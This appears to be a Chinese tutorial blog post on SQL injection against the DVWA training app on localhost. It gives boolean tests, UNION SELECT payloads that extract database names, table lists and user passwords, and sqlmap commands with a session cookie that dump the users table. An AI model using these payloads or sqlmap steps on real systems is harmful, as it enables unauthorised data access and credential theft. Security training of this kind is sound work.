Web安全--SQL注入漏洞利用

最新推荐文章于 2024-05-08 10:15:52 发布
最新推荐文章于 2024-05-08 10:15:52 发布
阅读量166 收藏
点赞数
分类专栏: 信息安全 系统安全 数据库 文章标签: sql web安全 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/theglasssky/article/details/130916775
版权

SQL注入漏洞判断

漏洞针对不同语言不同组成的后台有不一样的情况,注意源码中的情况做出不同的方案

  • 针对dvwa的php后台,先调整为low,针对其中的输入框,输入1’ and 1 = 1# 结果为正确
  • 输入1’ and 1=2# 结果为错,
  • 尝试两次1=1 正常输出,1=2明显是错的,,证明sql语句生效,存在sql注入漏洞

SQL注入漏洞利用

判断数据库行列数

  • 利用SQL语句
order by [column_num]

完整sql语句

SELECT first_name_,last_name FROM users WHERE user_id = '1' order by 1#';

在连接数据库的输入框中输入信息

  • 用户输入数据为’1’ order by 3#'时网页出现报错,证明该数据库表有2列

联合查询其他信息

union select [sql1][sql2]

select first_name,last_name from users where user_id = '1' union select user(),database()#';

在连接数据库的输入框中输入该信息
利用sql语句,执行了MySQL内置函数user()和database()

  • user():返回当前数据库连接用户
  • database():返回当前数据库名称

联合查询表

union select table_name,table_schema from information_schema.tables where table_schema='[database_name]'

	select first_name,last_name FORM users WHERE user_id= '1' union select table_name,table_schema from information_schema.tables where table_schema='dvwa'#';

用户输入sql语句,从information_schema数据库中查询dvwa数据库表

联合查询信息union [query_sql]

select first_name,last_name FROM users where user_id='1' union select userpassword from users#';

用户输入SQL语句,查询当前数据库的users表中user和password数据

sql注入工具

  • sqlmap
    kali自带,直接输入sqlmap执行

sqlmap自动化sql注入利用过程一般如下

  • 检测漏洞
python sqlmap.py -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#"--cookie="security=low;PHPpSESSID=bkka73fohiotnhmj84e0jp8e4"

-u:url地址,也就是需要检测的网址
-cookie:因为DAWA需要登录,可以在浏览器控制台里面查看请求消息头中获取cookie

  • 获取数据库名称
python sqlmap.py -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#"--cookie="security=low;PHPSESSID=bkka73fohiotnhmj84e0jp8e4"--dbs

–dbs:database server 获取所有数据库名字

  • 获取数据库表
python sqlmap.py -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#"--cookie="security=low;PHPSESSID=bkka73fohiotnhmj84e0jp8e4"-D dvwa --tables

-D:指想要获取的数据库
-tables:指获取的表

  • 获取表项
python sqlmap.py -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#"--cookie="security=low;PHPSESSID=bkka73fohiotnhmj84e0jp8e4"-D dvwa -T users --columns

-D:获取的数据库名
-T:指想要获取的表名
–clumns:列出表项/列

  • 获取数据
python sqlmap.py -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#"--cookie="security=low;PHPSESSID=bkka73fohiotnhmj84e0jp8e4"-D dvwa -T users --dump

–dump:获取数据

Theglassessky
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
web安全-sql注入漏洞
weixin_61956136的博客
07-18 1568
web安全-sql注入漏洞
Web安全漏洞:SQL注入
测试开发之路BeeTester
12-04 724
常见的Web安全漏洞:SQL注入、XSS跨站脚本攻击、文件上传漏洞、URL跳转漏洞,今天分享下SQL注入SQL注入可能造成:网页和数据被改,核心数据被窃,数据库所在的服务器被攻击 1.SQL注入的产生条件 3.SQL注入类型 3.数据类型 4.防御SQL注入 1.SQL注入的产生条件 SQL注入的产生条件:有参数传递、参数值代入数据库查询并且执行,后台在编写程序时没有对输入的数据进行过滤。 比...
浅谈SQL注入漏洞原理及利用方式
weixin_62369433的博客
11-15 2397
帮助读者快速理解SQL注入漏洞,更好的做出修复
11、SQL注入——SQL注入漏洞利用
qq_55202378的博客
12-05 259
攻击者利用Web应用程序对用户输入验证上的疏忽,在输入的数据中包含对某些数据库系统有特殊意义的符号或命令,让攻击者有机会直接对后台数据库系统下达指令,进而实现对后台数据库乃至整个应用系统的入侵。
SQL注入漏洞利用
最新发布
喜欢Python编程的程序员柚柚呀
05-08 790
SQL注入是一种注入攻击,可以执行恶意SQL语句。这些语句控制Web应用程序后面的数据库服务器。攻击者可以利用SQL 注入漏洞规避应用程序安全性方面的努力。他们可以绕过页面或Web应用程序的身份验证和授权,并恢复整个SQL数据库的内容。他们同样可以利用SQL注入来包含,更改和擦除数据库中的记录。SQL注入漏洞可能会影响使用SQL数据库的任何站点或Web应用程序,例如MySQL,Oracle,MSSQL或其他。
SQL注入经验方法总结
太阳照耀我走四方
07-02 1454
SQL注入经验方法总结
CSZ CMS 1.2.X sql注入漏洞
09-07
CSZ CMS 1.2.X版本(2019-06-20之前)中的core/MY_Security.php文件存在SQL注入漏洞。该漏洞源于基于数据库的应用缺少对外部输入SQL语句的验证。攻击者可利用该漏洞执行非法SQL命令。 ## 二、漏洞影响 CSZ CMS ...
利用SQL注入漏洞登录后台的实现方法
12-15
当攻击者成功利用SQL注入漏洞,他们可以构造恶意的SQL语句,以操纵数据库查询,获取敏感信息,甚至完全控制服务器。以下是对SQL注入的详细解释及其在登录后台中的实施方法。 1. **SQL注入的基本原理**: SQL注入的...
006-Web安全基础2 - 注入漏洞1
08-03
此外,还有各种自动化工具用于检测SQL注入漏洞,如Nessus、Burp Suite、Acunetix等,这些工具可以帮助开发者识别和修复潜在问题,增强Web应用程序的安全性。 总的来说,理解SQL注入的原理和防范措施对于保障Web应用...
利用SQL注入漏洞拖库的方法
09-11
SQL注入漏洞是一种常见的网络安全问题,主要出现在Web应用程序中,允许攻击者通过输入恶意的SQL语句来操纵数据库。本文将深入探讨如何利用SQL注入漏洞进行拖库操作,即获取数据库中的全部或部分数据。 首先,理解...
利用sql注入漏洞,获得数据库的数据信息(实验仅供参考,要遵守网络安全法)
weixin_50904074的博客
09-28 2827
1.开启预先准备好的xampp靶机 2.在主机上打开火狐,在输入框输入http://172.16.12.13:81(172.16.12.13是靶机地址) 81代表的是dvwa的端口号 3.输入用户名:admin密码:password登录 4.把安全等级改为low级,点击提交 5.打开burp suite软件,设置拦截请求 (拦截http请求是建立在网络代理相同的情况下,可以手动配置) 6.打开火狐,点击sql注入,在输入框中输入1,点...
web渗透-------WEB漏洞(SQL注入
hhhjjjllll的博客
05-09 1362
在mysql5.0以后的版本存在一个information_schema数据库、里面存储记录数据库名、表名、列名的数据库。(专门管理数据库的账户),root为最高权限,容易导致跨站注入数 据。普通用户:只能注入自己网站。相当于可以通过information_schema这个数据库获取到数据库下面的表名和列名。into outfile 或into dumpfile 文件写入。5)其他网站路径(进行文件读取,为高权限读取做准备)(不同的系统对数据库操作语句的大小写区分)当前网站的数据库是security。
WEB漏洞-SQL注入之MYSQL注入(学习笔记P13)
m0_51943976的博客
07-29 673
小迪安全学习笔记P13
SQL注入漏洞
来日可期的博客
08-24 2180
SQL注入SQL Injectian)是一种常见的Web安全漏洞。攻击者利用这个漏洞,可以增删改查数据库中数据,或者利用潜在的数据库漏洞进行攻击。
SQL注入原理及漏洞利用(入门级)
Hardworking666的博客
02-26 7471
攻击者利用Web应用程序对用户输入验证上的疏忽,在输入的数据中包含对某些数据库系统有特殊意义的符号或命令,让攻击者有机会直接对后台数据库系统下达指令,进而实现对后台数据库乃至整个应用系统的入侵。SQL注入原理服务端没有过滤用户输入的恶意数据,直接把用户输入的数据当做SQL语句执行,从而影响数据库安全和平台安全SQL注入过程SQL注入带来的危害绕过登录验证:使用万能密码登录网站后台等获取敏感数据:获取网站管理员帐号、密码等文件系统操作:列目录,读取、写入文件等。
利用漏洞注入(sql注入
xianyunb的博客
06-21 348
所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行指定的SQL语句。主要原因是程序员在开发用户和数据库交互的系统时没有对用户输入的字符串进行过滤,转义,限制或处理不严谨,导致用户可以通过输入精心构造的字符串去非法获取到数据库中的数据。具体来说,它是利用现有应用程序,将SQL语句注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入SQL语句得到一个存在安全漏洞的网站上的数据,而不是按照设计者。
Web安全揭秘:SQL注入漏洞实战教程
本资源是一份关于Web安全SQL注入漏洞的详细教程——《注入攻击:Web安全SQL注入漏洞专题》的腾讯培训PPT讲义。该PPT主要针对初学者和安全专业人员,讲解了SQL注入攻击的手动操作方法和常用工具SqlMap的应用,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值